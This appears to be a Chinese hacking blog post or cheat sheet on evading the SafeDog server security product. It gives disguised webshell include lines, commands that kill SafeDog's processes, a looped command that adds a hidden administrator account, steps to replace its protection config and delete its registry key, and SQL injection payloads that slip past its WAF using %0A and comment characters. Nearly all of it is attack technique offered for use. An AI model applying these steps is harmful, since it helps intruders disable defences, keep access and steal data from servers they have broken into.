· 包含结束进程杀狗
包含shell过狗
asp:<!–#include file=”lcx.asp;1.jpg”–>
php:<?php
include(‘logo.txt’);
?>
强制结束进程: taskkill /f /t /im SafeDogGuardCenter.exe
结束进程2: ntsd -c q -pid 1032
安全狗,在命令下添加用户:
for /l %i in (1,1,1000) do @net user test test /add&@net localgroup administrators test
/addad.bat 使用
for /l %%i in (1,1,1000) do @net user test test /add&@net localgroup administrators test
/add
安全猪开启各种保护,突破方法:
首先在Shell下把安全猪的安装配置给下来 默认安装路径:
C:\Program Files\SafedogServer\SafeDogGuardCenter\Config\DirDefend.xml
导入本地的安全服务器安全狗查看 主动防御 – 文件及目录保护 查看是否开启各种保护
如果开启了,直接关掉。然后再把DirDefend.xml替换到远程服务器上去,重启服务器,各种操作。
安全猪开启密码保护模式,突破方法:
打开注册表 regedit ,找到HKEY_LOCAL_MACHINE\SOFTWARE\Safedog\SafedogSR 删除SafedogSR 即可
突破安全猪密码保护。
测试时间:2014.10.21
测试版本:IIS版V3.3.09476(2014-09-24)、Apache V3.1.08512(2014-05-29),均为今天能下到的最
新版。
用于绕过的核心字符:%0A,某些特殊场合需要和注释符配合使用。测试详细步骤:
1、本机安装了存在注入的V5shop(构架为IIS6+ASPX+MSSQL2005,以测试IIS版本的安全狗),常规注
入测试:
https://192.168.91.152/cart.aspx?act=buy&id=1 AND 1=user另外:在Apache+php+Mysql环境中:
先按常规进行注入尝试:
https://192.168.91.152:8000/About.php?did=2 and/**/(select user())=”因为and、user()均为黑名单里的关键字。那么我们加入%0A再次尝试:
https://192.168.91.152:8000/About.php?did=2%0Aand/**/(select%0Auser())=”
https://192.168.91.152:8000/About.php?did=2%0Aand/**/(select%0Auser())=’root@localhost’当然,%0A只是一个思路,由此发散开来便是多个%0A叠加,或者与注释符–、/**/混合使用。比如:
https://192.168.91.152:8000/About.php?did=-2%0Aunion–%0Aselect%0Auser()
评论